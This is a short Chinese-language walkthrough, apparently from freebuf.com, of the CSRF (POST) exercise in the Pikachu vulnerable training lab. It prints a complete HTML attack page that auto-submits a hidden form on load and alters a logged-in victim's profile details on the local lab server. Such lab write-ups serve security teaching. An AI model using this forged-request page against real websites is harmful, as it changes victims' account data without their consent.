pikachu靶场-CSRF(跨站请求伪造)-CSRF(post) login – 作者:知非知非知非

登录成功！！！！

修改信息，接着BURP抓包！！！

post形式的构造是无法在url中体现的。所以只能从请求包中的参数想办法。

这里直接采用大佬写的界面：

<html>

<head>

<script>

window.onload = function() {

document.getElementById(“postsubmit”).click();

}

</script>

</head>

<body>

<form method=”post” action=”http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php”>

<input id=”sex” type=”text” name=”sex” value=”boy” />

<input id=”phonenum” type=”text” name=”phonenum” value=”54213″ />

<input id=”add” type=”text” name=”add” value=”hacker” />

<input id=”email” type=”text” name=”email” value=”[email protected]” />

<input id=”postsubmit” type=”submit” name=”submit” value=”submit” />

</form>

</body>

</html>

当登录的账户访问该界面后，点SUBMIT后，信息提交！！！！

就会修改相关的信息！！！

如下！！！

来源：freebuf.com 2021-07-20 08:11:58 by: 知非知非知非